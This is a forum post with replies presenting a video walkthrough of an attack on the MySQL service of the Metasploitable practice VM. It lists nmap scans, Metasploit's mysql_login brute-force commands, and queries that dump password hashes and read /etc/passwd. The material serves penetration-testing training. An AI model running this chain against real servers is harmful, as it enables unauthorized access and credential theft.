[Video] Metasploitable - MySQL

[g0tmi1k]

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826084
Download video: http://www.mediafire.com/?cyz2gr42p49rkzm
Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw


What is this?
This video demonstrates an attack on the MySQL database service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com


What is this?
This video demonstrates an attack on the MySQL database service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com


Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to brute force the login (gaining access)
> By using MySQL client we are able to send commands to the database (Discover password hashes and reading files)


What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> MySQL --- on Backtrack 4 (Final) > Dictionaries/Word-lists --- Usernames Passwords
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)

> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

Commands:

Code:

nmap 192.168.1.1-255
nmap -sS -sV -O -f -n 192.168.1.105
msfconsole
search mysql
use scanner/mysql/mysql_login
show options 
set RHOSTS 192.168.1.105
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
mysql -h 192.168.1.105 -u root -p
root
show databases;
use mysql
show tables;
select User, Password, from user;
select load_file('/etc/passwd');

Notes:
Song: Roberto Sol and Chris le Blanc; Ines - Sueno Damor
Video length: 3:24
Capture length: 9:14

Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-mysql.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30076-%5Bvideo%5D-metasploitable-mysql.html#post167040

[alex198555]

Is there any advance tutorial to follow?! Like, a complicated passwords list in order to log in MySQL database?!

[hypervista]

alex - google JTR (John the Ripper) and check out this guide. Good luck.

[g0tmi1k]

Is there any advance tutorial to follow?! Like, a complicated passwords list in order to log in MySQL database?!

Im not sure what you mean. Are you asking for a bigger/complex wordlists?
If so:
> Im lists a couple on my blog: http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
> I answer a few common questions/answers too: http://g0tmi1k.blogspot.com/2011/01/...uary-2011.html

[securityxxxpert]

Is there any advance tutorial to follow?! Like, a complicated passwords list in order to log in MySQL database?!

Alex198555,

What baffles me is why you would want such a thing. Bigger does not always mean better, in fact I will take a well tuned word/pass list any day vs a bunch of dictionary text file. You know what I like even more than that? Authentication Bypass and weak passwords to web logins, those are my personal favorite. Always try to go after the "low hanging fruit"

Securityxxxpert